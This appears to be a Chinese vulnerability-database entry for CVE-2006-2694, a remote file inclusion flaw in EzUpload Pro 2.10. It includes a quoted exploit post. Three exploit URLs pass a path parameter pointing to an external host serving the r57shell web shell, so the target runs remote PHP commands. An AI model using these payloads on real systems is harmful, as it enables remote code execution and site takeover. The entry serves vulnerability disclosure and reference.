EzUpload Pro 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194806 漏洞类型 输入验证
发布时间 2006-05-31 更新时间 2006-05-31
CVE编号 CVE-2006-2694 CNNVD-ID CNNVD-200605-552
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006060004
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-552
|漏洞详情
EzUploadPro2.10存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1)form.php,(2)customize.php,和(3)initialize.php的path参数当中的URL,执行任意PHP代码。
|漏洞EXP
multiple file include exploits in EzUpload Pro v2.10

forum type : EzUpload Pro v2.10

bug found by : black-code & sweet-devil

team : site-down

type : file include

####################################################

exploits :

form.php

http://www.example.com/path/form.php?path=http://rst.void.ru/download/r5
7shell.txt?&cmd=pwd

customize.php

http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru
/download/r57shell.txt?&cmd=pwd

initialize.php

http://www.example.com/arab3upload/initialize.php?path=http://rst.void.r
u/download/r57shell.txt?&cmd=pwd

####################################################

path to admin login:

#######################

emails:

black-cod3 (at) hotmail (dot) com [email concealed]  &  gamr-14 (at) hotmail (dot) com [email concealed]

#######################

All my respect to our friends , lezr.com , g123g.net

done .. peace
|参考资料

来源:BID
名称:18135
链接:http://www.securityfocus.com/bid/18135
来源:BUGTRAQ
名称:20060528multiplefileincludeexploitsinEzUploadProv2.10
链接:http://www.securityfocus.com/archive/1/archive/1/435276/100/0/threaded
来源:XF
名称:ezupload-multiple-file-include(26821)
链接:http://xforce.iss.net/xforce/xfdb/26821
来源:SREASON
名称:998
链接:http://securityreason.com/securityalert/998